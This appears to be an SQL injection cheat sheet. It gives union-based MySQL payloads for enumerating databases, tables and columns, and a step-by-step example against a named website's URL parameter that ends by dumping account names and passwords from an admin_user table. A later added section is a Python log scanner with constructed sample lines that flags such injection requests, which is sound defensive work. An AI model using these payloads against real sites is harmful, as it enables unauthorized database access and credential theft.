Enumerate databases

id=-1 union select 1,..,SCHEMA_NAME,n from/**/information_schema.SCHEMATA limit 1,1/*

Enumerate tables

id=-1/**/union/**/select/**/1,TABLE_NAME,N/**/from/**/information_schema.TABLES/**/where/**/TABLE_SCHEMA=<hex value of the database name>/**/limit/**/1,1

Enumerate columns

id=-1/**/union/**/select/**/1,COLUMN_NAME,N/**/from/**/information_schema.COLUMNS/**/where/**/TABLE_NAME=<hex value of the table name>/**/limit/**/1,1

MySQL 5 advanced injection method: dumping table names

Example:

1. Dump table names
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,TABLE_NAME,5/**/From/**/information_schema.TABLES/**/Where/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/* (0x79645F7465616D6E6574 is the hexadecimal encoding of the database name yd_teamnet)
Stepping through the results this way, the admin_user table appeared at the 4th one.

2. Dump column names
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,COLUMN_NAME,5/**/From/**/information_schema.COLUMNS/**/Where/**/TABLE_NAME=0x61646D696E5F75736572/**/And/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/*

3. Dump passwords
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,concat(0x7c,ID,0x7c,ACCOUNT,0x7c,PASSWORD,0x7c),5/**/From/**/admin_user/**/limit/**/0,1/*
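
From the defending side, requests shaped like the ones above stand out in web server logs once URL encoding and the /**/ comment-as-space trick are undone. The following is an added example, not part of the original post: a log check that normalizes each request target and reports it when at least two of the patterns used above (union select, information_schema lookups, hex-encoded string literals, the and 1=2 prefix) occur together. The log format, host, paths, rule names and threshold are assumptions, and the sample lines are constructed.

```python
import re
from urllib.parse import unquote_plus

COMMENT = re.compile(r"/\*.*?\*/", re.S)    # /**/ used in place of spaces
OPEN_COMMENT = re.compile(r"/\*.*$", re.S)   # trailing unterminated /*
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/')

# Hypothetical rule names; patterns are matched on the normalized, lowercased target.
RULES = {
    "union_select": re.compile(r"\bunion\s+(?:all\s+)?select\b"),
    "information_schema": re.compile(
        r"\binformation_schema\s*\.\s*(?:schemata|tables|columns)\b"),
    "hex_string_literal": re.compile(r"=\s*0x(?:[0-9a-f]{2}){4,}\b"),
    "always_false_prefix": re.compile(r"\band\s+1\s*=\s*2\b"),
}

def normalize(target):
    """Undo URL encoding and comment-as-whitespace tricks before matching."""
    text = unquote_plus(unquote_plus(target))  # second pass covers double encoding
    text = OPEN_COMMENT.sub(" ", COMMENT.sub(" ", text))
    return re.sub(r"\s+", " ", text).lower().strip()

def classify(target):
    """Return the sorted names of all rules that match the request target."""
    norm = normalize(target)
    return sorted(name for name, rx in RULES.items() if rx.search(norm))

def scan(log_lines, threshold=2):
    """Return [(line_no, hits)] for requests matching at least `threshold` rules."""
    findings = []
    for no, line in enumerate(log_lines, 1):
        m = REQUEST.search(line)
        hits = classify(m.group(1)) if m else []
        if len(hits) >= threshold:
            findings.append((no, hits))
    return findings

# Constructed access-log lines (hypothetical client, paths and values).
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jan/2024:10:00:00 +0000] "GET /item.php?id=13 HTTP/1.1" 200 512',
    '203.0.113.7 - - [01/Jan/2024:10:00:05 +0000] "GET /item.php?id=13/**/and/**/1=2/**/union/**/select/**/1,2,3,TABLE_NAME,5/**/From/**/information_schema.TABLES/**/Where/**/TABLE_SCHEMA=0x73686F705F6462/**/limit/**/0,1/* HTTP/1.1" 200 498',
    '203.0.113.7 - - [01/Jan/2024:10:00:09 +0000] "GET /item.php?id=-1%20union%20select%201,SCHEMA_NAME,3%20from/**/information_schema.SCHEMATA%20limit%201,1/* HTTP/1.1" 200 490',
    '198.51.100.4 - - [01/Jan/2024:10:01:00 +0000] "GET /search.php?q=credit+union+select+committee HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for no, hits in scan(SAMPLE_LOG):
        print(f"line {no}: {', '.join(hits)}")
```

The two-rule threshold keeps the ordinary search on the last sample line, which matches only the union select pattern, out of the findings.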